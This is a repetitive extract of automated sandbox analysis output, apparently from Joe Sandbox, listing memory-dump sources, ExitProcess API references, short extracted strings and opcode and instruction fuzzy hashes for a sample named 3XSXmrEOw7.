                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 0-3687113455
                                                                                                                                              • Opcode ID: 4a66ad29619ac676a93144ee969966daf6e513a139b26c504096f27bf0c2153e
                                                                                                                                              • Instruction ID: 5735f5ab838bd17a2a2fb1866061a4ed934e0264e27ca9799a63e166222e5c24
                                                                                                                                              • Opcode Fuzzy Hash: 4a66ad29619ac676a93144ee969966daf6e513a139b26c504096f27bf0c2153e
                                                                                                                                              • Instruction Fuzzy Hash: 76A136A2C082A49AF7218224DC447EB7A68DF51314F1840FED98D672C1DABE0FD5CB67
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 0-3495335710
                                                                                                                                              • Opcode ID: 356cb6b6af8fe70fdd6c351638d77fc7f100cfa8c1bb793a0c92c0e9c193bf2a
                                                                                                                                              • Instruction ID: 34fddcb1e9d5058dcc7c149b19fa34fb0f35074b7671cf4c9403869f234c370d
                                                                                                                                              • Opcode Fuzzy Hash: 356cb6b6af8fe70fdd6c351638d77fc7f100cfa8c1bb793a0c92c0e9c193bf2a
                                                                                                                                              • Instruction Fuzzy Hash: 10A147A2C082A49AF7208224DC447E77A69DF51314F0440FED98D672C1DABE0FD5CB67
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: L$L$Q$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                                              • API String ID: 0-362670629
                                                                                                                                              • Opcode ID: ee3de20643e8a4cb37e7f02d86109b2d841ca61146a646775295e19ff8e22f67
                                                                                                                                              • Instruction ID: ebda467260b922b430d7c10c8d5c8c230fff28bf33abcdce350ed1e6cf4495ba
                                                                                                                                              • Opcode Fuzzy Hash: ee3de20643e8a4cb37e7f02d86109b2d841ca61146a646775295e19ff8e22f67
                                                                                                                                              • Instruction Fuzzy Hash: 969147E2C042649AF7208624EC447E77A28DF50314F1440FED98D672C1DABE0FC68BA7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: L$L$Q$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                                              • API String ID: 0-362670629
                                                                                                                                              • Opcode ID: c4f028e7766f9711cdf050a13418965ce0e6ba244347ff9df3922f9d2b371101
                                                                                                                                              • Instruction ID: b7d4b4e4f70d161fc8e6186cf41b612343db26370f5afff7722bf30da49ce927
                                                                                                                                              • Opcode Fuzzy Hash: c4f028e7766f9711cdf050a13418965ce0e6ba244347ff9df3922f9d2b371101
                                                                                                                                              • Instruction Fuzzy Hash: A58124A2C042649AF7218624EC447EB7A78DF50314F1440FED94DA72C1DABE0FD68BA7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: L$L$Q$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                                              • API String ID: 0-362670629
                                                                                                                                              • Opcode ID: 39a48382bbafa562567b07526fbcc5a484c1dd0a053792aae783f587aa057ea8
                                                                                                                                              • Instruction ID: 01f98888b8178c1e4de167165ef80fa34ba42e1b3813b0e96653d14865058fd7
                                                                                                                                              • Opcode Fuzzy Hash: 39a48382bbafa562567b07526fbcc5a484c1dd0a053792aae783f587aa057ea8
                                                                                                                                              • Instruction Fuzzy Hash: CD8126A2C042649AF7218624EC447EB7A78DF50314F1440FED94DA72C1DABE0FD68BA7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                                              • API String ID: 0-1254073115
                                                                                                                                              • Opcode ID: eef1b0159310960a5579aeecca145dc0f6b7b6d5c8a821815ff35db13d52961e
                                                                                                                                              • Instruction ID: 6e0dc6df7026693b3059b0e6e8dd19d81659089e6b85c43b871315c3051e56dc
                                                                                                                                              • Opcode Fuzzy Hash: eef1b0159310960a5579aeecca145dc0f6b7b6d5c8a821815ff35db13d52961e
                                                                                                                                              • Instruction Fuzzy Hash: 1A7117A2D082649AF7118624DC447EB7A39DF90314F1480FED94D676C1DABE0FC68B67
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                                              • API String ID: 621844428-1254073115
                                                                                                                                              • Opcode ID: c15f0309d1f8947013e935a5b2f87d95b4204988901cc44e5628654f1e969098
                                                                                                                                              • Instruction ID: 1d5c0d6fc0a0cad58a64867cb9dda15ac2d09c3e53903cdbc0d09b8f6bae42ef
                                                                                                                                              • Opcode Fuzzy Hash: c15f0309d1f8947013e935a5b2f87d95b4204988901cc44e5628654f1e969098
                                                                                                                                              • Instruction Fuzzy Hash: 3E6103A2D082649AF7218624DC447EB7A79DF50314F1440FED94DA72C1DABE0FC68B67
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                                              • API String ID: 621844428-1254073115
                                                                                                                                              • Opcode ID: e6066a3d4abbb1635fe5fae22006a3be89af81795a40b67f7128f1f6f5e0f16a
                                                                                                                                              • Instruction ID: df686831fa21e1befb851f5356a7e8b2e602615655cf4bead9fa41a67d850fbd
                                                                                                                                              • Opcode Fuzzy Hash: e6066a3d4abbb1635fe5fae22006a3be89af81795a40b67f7128f1f6f5e0f16a
                                                                                                                                              • Instruction Fuzzy Hash: BF6115A2D082649AF7218624DC447EB6A79DF50314F1440FED98D672C1DABE0FC6CB67
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                                              • API String ID: 621844428-1254073115
                                                                                                                                              • Opcode ID: 9015c192cc738454935b7f6c103b2843e83d8686b0f842729940c2491ad02f88
                                                                                                                                              • Instruction ID: ed1d0fc44fa6dae5abd16b68b09f099e354a328653aca3ac19db7560fdff8759
                                                                                                                                              • Opcode Fuzzy Hash: 9015c192cc738454935b7f6c103b2843e83d8686b0f842729940c2491ad02f88
                                                                                                                                              • Instruction Fuzzy Hash: 886125A2D082649AF7218624DC447EB7A79DF90314F1440FED94DA72C1DABE0FC68B67
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: :2JA
                                                                                                                                              • API String ID: 621844428-2456821934
                                                                                                                                              • Opcode ID: f3c878ab16705ea9f82f92b0ddee40d50b4276ea5531a59f84641f81612c9b0d
                                                                                                                                              • Instruction ID: bf51dbdda2850569a1e7a74a7fe0387b01734766c60d2e2ccaf44523e746ffd9
                                                                                                                                              • Opcode Fuzzy Hash: f3c878ab16705ea9f82f92b0ddee40d50b4276ea5531a59f84641f81612c9b0d
                                                                                                                                              • Instruction Fuzzy Hash: 0F8157B2C042549FF714CA64DC84AEB7B78FB80314F2581BBD94DA7282D67D5EC2CA52
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: Windows 95
                                                                                                                                              • API String ID: 621844428-1505401244
                                                                                                                                              • Opcode ID: 50a9c8f689e76349132a38162203a535cafa4444d6dfc1baadaec9f358013911
                                                                                                                                              • Instruction ID: 54e852cc576455bbeb4d16f42f89e961844592acf3bb7ffbb43d7618b21edb90
                                                                                                                                              • Opcode Fuzzy Hash: 50a9c8f689e76349132a38162203a535cafa4444d6dfc1baadaec9f358013911
                                                                                                                                              • Instruction Fuzzy Hash: 2171F6F2D041149BF7148B14DD45BFBB67AEF90310F2481BFE84966784EA7D5EC28A22
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: 466a86207167e43278c49b8836738d82a8810691bc9301ea5ff31ad0459951fb
                                                                                                                                              • Instruction ID: 71c2d81bb5cba6040eb8f671395b0986b91675529fa7c06a0e2a8f7b7a932dce
                                                                                                                                              • Opcode Fuzzy Hash: 466a86207167e43278c49b8836738d82a8810691bc9301ea5ff31ad0459951fb
                                                                                                                                              • Instruction Fuzzy Hash: 837113B2E085649BF7208A68DC94BEF7B79FBC0315F1441BBD90E622C1D73C1E868A55
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                                              • API String ID: 621844428-1254073115
                                                                                                                                              • Opcode ID: e73cb6a01dc10b5a82334384cf326f9750e6c6c60bf6ad37b4e053010980c236
                                                                                                                                              • Instruction ID: 002ba12ece9c9b47baed33734d15a8fee468393e4ca8b9fa760db5392b251f20
                                                                                                                                              • Opcode Fuzzy Hash: e73cb6a01dc10b5a82334384cf326f9750e6c6c60bf6ad37b4e053010980c236
                                                                                                                                              • Instruction Fuzzy Hash: 7B6125A2D086649AF7208624EC447E76A39DF50310F1440FED94DA72C1DABE0FD68BA7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                                              • API String ID: 621844428-1254073115
                                                                                                                                              • Opcode ID: 606e63f531aa979e66e4b79544cdfa3c1b55464958fa5903861b0c72f1933b73
                                                                                                                                              • Instruction ID: 70b32fb56e953e831ee1c6a9b067e3275182b7350fbba4091f78134af53b1258
                                                                                                                                              • Opcode Fuzzy Hash: 606e63f531aa979e66e4b79544cdfa3c1b55464958fa5903861b0c72f1933b73
                                                                                                                                              • Instruction Fuzzy Hash: 3F6114A2D082649AF7218624DC447EB7A79DF50314F1440FED94DA72C1DABE0FC68B67
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                                              • API String ID: 621844428-1254073115
                                                                                                                                              • Opcode ID: c4be063b547142f42d0c13c4066b1a4a8f240d041d58b5e6cc6055d236f2c1ef
                                                                                                                                              • Instruction ID: a72bb31166aa381497903e97bc9c24f5bcc4b6703112e4e099c378d301880388
                                                                                                                                              • Opcode Fuzzy Hash: c4be063b547142f42d0c13c4066b1a4a8f240d041d58b5e6cc6055d236f2c1ef
                                                                                                                                              • Instruction Fuzzy Hash: D06103A1D082649AF7218624DC447EB7A39DF50310F1440FED94DA72C1DABE0FC68B67
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                                              • API String ID: 621844428-1254073115
                                                                                                                                              • Opcode ID: b61b37e6c1c3ce702835899ca951e94c148d5ddb985cd3c2e1f30e08d6961b1c
                                                                                                                                              • Instruction ID: 908e1b507a0170028a9da51af9384c436a8bbe588f6ececa98b85f8372e705ec
                                                                                                                                              • Opcode Fuzzy Hash: b61b37e6c1c3ce702835899ca951e94c148d5ddb985cd3c2e1f30e08d6961b1c
                                                                                                                                              • Instruction Fuzzy Hash: CB5114A1D082648AF7218624DC447EB7A39DF91310F1440FED98DA76C1DABE0FD68B67
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: GGN9$Windows 95
                                                                                                                                              • API String ID: 621844428-3770922624
                                                                                                                                              • Opcode ID: 35d5a47730b24da60319818b9ddf853cfb2f8b3c7cb5040908ea032ef5fb614c
                                                                                                                                              • Instruction ID: 1e537a0af2ca5927453d0216449e8262732467145e920a59f4c5c1172cade705
                                                                                                                                              • Opcode Fuzzy Hash: 35d5a47730b24da60319818b9ddf853cfb2f8b3c7cb5040908ea032ef5fb614c
                                                                                                                                              • Instruction Fuzzy Hash: 0F31F5F2D041249EF3504654ED84BFB362CDB80320F24817FD84EA66C1EA7D5EC689A7
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: 2H?$Windows 95
                                                                                                                                              • API String ID: 621844428-1577999745
                                                                                                                                              • Opcode ID: 557803fb8bd20435206b454844b31fe281f146a0072662f4d932d07f3a7b7531
                                                                                                                                              • Instruction ID: df9b69ad1b3a695b7739b8a46ca64f59184ba8a5aea23e33a92a66da250e7302
                                                                                                                                              • Opcode Fuzzy Hash: 557803fb8bd20435206b454844b31fe281f146a0072662f4d932d07f3a7b7531
                                                                                                                                              • Instruction Fuzzy Hash: 66F0BBE24041045EF3904514ED45BB7352DEBC0725F24857BE54DE59C0EB3D5EDA8962
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: XS
                                                                                                                                              • API String ID: 621844428-3742125962
                                                                                                                                              • Opcode ID: 0ef25803c13e20af9dc778cc44436636eddc744375c3422ed6ea6209976354ca
                                                                                                                                              • Instruction ID: a598b56ad7ce94824c6271aba02b776f62d75a0bea01325358fd3efd258981fd
                                                                                                                                              • Opcode Fuzzy Hash: 0ef25803c13e20af9dc778cc44436636eddc744375c3422ed6ea6209976354ca
                                                                                                                                              • Instruction Fuzzy Hash: 575157F2D04154ABF7208A21DC44BAB7B78EBC1314F1881BBD90D63382D63D6EC6CA52
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: Windows 95
                                                                                                                                              • API String ID: 621844428-1505401244
                                                                                                                                              • Opcode ID: 65ed9145258f5a4505704d2105be48a53147dc18223b7f21a8b4a6edc79f2ac5
                                                                                                                                              • Instruction ID: b5c5277cee7fc260ead8147ba84ca6eb3f3e9c1979ee068eb39e8a28ff91bfcc
                                                                                                                                              • Opcode Fuzzy Hash: 65ed9145258f5a4505704d2105be48a53147dc18223b7f21a8b4a6edc79f2ac5
                                                                                                                                              • Instruction Fuzzy Hash: A15115F2D041149FF7248A14DD45BFB7679EF80310F2481BBE84DA2780EA7D5EC58A66
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: Windows 95
                                                                                                                                              • API String ID: 621844428-1505401244
                                                                                                                                              • Opcode ID: e2842fda6e01ffc964cc67038059166aa85a9d0e01609f0bc19109ce1b98e191
                                                                                                                                              • Instruction ID: 313057cb3b46385950b25b97b415f34978dc172aa2866f2568b428467c6bd824
                                                                                                                                              • Opcode Fuzzy Hash: e2842fda6e01ffc964cc67038059166aa85a9d0e01609f0bc19109ce1b98e191
                                                                                                                                              • Instruction Fuzzy Hash: 0641F3F1D041189AF7248A14DD45BFB7679EF80310F2081BBE949A2380EA3D1EC68A26
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: Windows 95
                                                                                                                                              • API String ID: 621844428-1505401244
                                                                                                                                              • Opcode ID: c372c9a1eb8374a87d414c5c73ded79d1c0e7af0199d784701ed0116f8e5fcc6
                                                                                                                                              • Instruction ID: ab4b0dc805ec14251dad51e0dbf35e1a23775ed037f1a3276dace4db49703fd9
                                                                                                                                              • Opcode Fuzzy Hash: c372c9a1eb8374a87d414c5c73ded79d1c0e7af0199d784701ed0116f8e5fcc6
                                                                                                                                              • Instruction Fuzzy Hash: 524118F2D041149BF7148B24DD45BFB7679EF90310F1481BFE909A2780EA3D1EC58626
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: Windows 95
                                                                                                                                              • API String ID: 621844428-1505401244
                                                                                                                                              • Opcode ID: 9701c0c7ff79db85fca70d0c1f201ae6b3e783d81af0756f664c11b89e6fabce
                                                                                                                                              • Instruction ID: 868afd68e3f4b1ed1163f8b7669db27d3b053efb1f64048eccbdb9cc034c9360
                                                                                                                                              • Opcode Fuzzy Hash: 9701c0c7ff79db85fca70d0c1f201ae6b3e783d81af0756f664c11b89e6fabce
                                                                                                                                              • Instruction Fuzzy Hash: C34117F2D041149BF7648B64ED497FB7675EF90310F1481BFE90AA2380EA3D1EC58A26
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: Windows 95
                                                                                                                                              • API String ID: 621844428-1505401244
                                                                                                                                              • Opcode ID: 55eaf7b5eca8cf8464d024d76604aa5ec655f6376b29bc9e4266c05e0e11f99e
                                                                                                                                              • Instruction ID: 74791d0c22545c70055771e6a2a9eb0c146df827dad2ee69b64c3d2af2ffbd2c
                                                                                                                                              • Opcode Fuzzy Hash: 55eaf7b5eca8cf8464d024d76604aa5ec655f6376b29bc9e4266c05e0e11f99e
                                                                                                                                              • Instruction Fuzzy Hash: 2431C4F2D041249EF3504654ED84BF73629DB80320F14817BE84E66AC1EA7D5ED689A7
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: Windows 95
                                                                                                                                              • API String ID: 621844428-1505401244
                                                                                                                                              • Opcode ID: f20eb3486194cf148af31e9bdd86380c36666145721df0d1448519d9a65ecc7e
                                                                                                                                              • Instruction ID: 140f1c7e1b095d92c3b7c4c23f811b4d95b57dd32647f48bef23675d0c3024c2
                                                                                                                                              • Opcode Fuzzy Hash: f20eb3486194cf148af31e9bdd86380c36666145721df0d1448519d9a65ecc7e
                                                                                                                                              • Instruction Fuzzy Hash: 4631C5B1D042149EF7648B54DD44BFB7675EF94310F2081BBE94DA2384EA3D1EC5CA26
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: Windows 95
                                                                                                                                              • API String ID: 621844428-1505401244
                                                                                                                                              • Opcode ID: 993bfc68d75e592377ec58a616de79beaebe56c1ff244e9902020d8ea566cdae
                                                                                                                                              • Instruction ID: f04b1176644581f3c7dc485effa38cd8cde1eab7a67360eda047778b644b472c
                                                                                                                                              • Opcode Fuzzy Hash: 993bfc68d75e592377ec58a616de79beaebe56c1ff244e9902020d8ea566cdae
                                                                                                                                              • Instruction Fuzzy Hash: D921D3E2D042249EF7504620DD84BB7362CEBC0721F14417BE84E66AC4EA7D1FD58966
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: Windows 95
                                                                                                                                              • API String ID: 621844428-1505401244
                                                                                                                                              • Opcode ID: 7afcbc2710a91863f03e035ccd55edd61f846bc6efc3210ce1fe36178c94fa0a
                                                                                                                                              • Instruction ID: c4680c653a7a46c7e4a6515e3789306913bda43818eaeb427b91c564f5923f34
                                                                                                                                              • Opcode Fuzzy Hash: 7afcbc2710a91863f03e035ccd55edd61f846bc6efc3210ce1fe36178c94fa0a
                                                                                                                                              • Instruction Fuzzy Hash: B61104B29001148EF7608924EE447BB767AEBD0310F20C2BFD849745C4DB3D0FD68922
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
